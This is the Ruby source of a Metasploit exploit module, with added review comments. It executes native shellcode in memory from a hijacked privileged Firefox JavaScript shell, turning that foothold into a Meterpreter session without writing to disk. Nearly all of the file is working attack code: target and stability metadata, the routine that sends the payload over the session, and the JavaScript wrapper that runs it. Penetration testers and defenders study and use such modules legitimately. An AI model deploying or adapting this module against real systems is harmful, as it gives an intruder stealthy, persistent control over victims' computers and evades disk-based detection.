rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/firefox/local/exec_shellcode.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Local module that operates on an already-established privileged Firefox
# JavaScript shell session: it sends a JavaScript wrapper over that session and
# reports back whatever the shell returns.
#
# NOTE(review): per the module description the payload is placed in memory and
# not written to disk, and the module itself declares IOC_IN_LOGS as its side
# effect. Anyone assessing coverage for this technique should therefore expect
# log and in-process evidence rather than on-disk artifacts.
class MetasploitModule < Msf::Exploit::Local
  # Missing autodetection, but has widespread targetability
  Rank = ExcellentRanking

  include Msf::Payload::Firefox
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  # Declares the module metadata (name, description, single target, notes) and
  # registers the TIMEOUT option used when waiting for the shell's reply.
  #
  # @param info [Hash] metadata supplied by the framework, merged through update_info
  def initialize(info = {})
    # The only target: any architecture on the listed host platforms.
    native_target = [
      'Native Payload',
      {
        'Platform' => ['linux', 'osx', 'win', 'unix'],
        'Arch' => ARCH_ALL
      }
    ]

    # Reliability / stability / side-effect declarations for this module.
    module_notes = {
      'Reliability' => [REPEATABLE_SESSION],
      'Stability' => [CRASH_SAFE],
      'SideEffects' => [IOC_IN_LOGS]
    }

    super(
      update_info(
        info,
        'Name' => 'Firefox Exec Shellcode from Privileged Javascript Shell',
        'Description' => %q{
          This module allows execution of native payloads from a privileged Firefox Javascript shell.
          It places the specified payload into memory, adds the necessary protection flags,
          and calls it, which can be useful for upgrading a Firefox javascript shell to a Meterpreter
          session without touching the disk.
        },
        'License' => MSF_LICENSE,
        'Author' => ['joev'],
        'Platform' => ['firefox'],
        'DisclosureDate' => '2014-03-10',
        'Targets' => [native_target],
        'Notes' => module_notes,
        'DefaultTarget' => 0
      )
    )

    timeout_option = OptInt.new(
      'TIMEOUT',
      [true, 'Maximum time (seconds) to wait for a response', 90]
    )
    register_options([timeout_option])
  end

  # Sends the JavaScript wrapper to the existing session between [JAVASCRIPT]
  # tags, then reads the reply up to the '[!JAVASCRIPT]' token, waiting at most
  # TIMEOUT seconds. Any non-blank reply is printed with print_warning, which
  # includes the wrapper's own "Payload executed." message as well as a caught
  # JavaScript exception.
  def exploit
    print_status('Running the JavaScript shell...')

    tagged_script = "[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]"
    session.shell_write(tagged_script)

    # The 0 is passed through as-is; its meaning is defined by the session
    # class, which is not shown in this file.
    wait_seconds = datastore['TIMEOUT']
    reply = session.shell_read_until_token('[!JAVASCRIPT]', 0, wait_seconds)
    return unless reply.present?

    print_warning(reply)
  end

  # Builds the JavaScript sent to the shell: an immediately-invoked function
  # that runs the output of run_payload inside try/catch and reports either
  # "Payload executed." or the caught exception through the shell's send().
  # run_payload is not defined in this file; presumably it comes from one of
  # the included mixins.
  #
  # @return [String] the wrapper script with surrounding whitespace stripped
  def js_payload
    wrapper = %|
      (function(send){
        try {
          #{run_payload}
          send("Payload executed.");
        } catch (e) {
          send(e);
        }
      })(send);
    |
    wrapper.strip
  end
end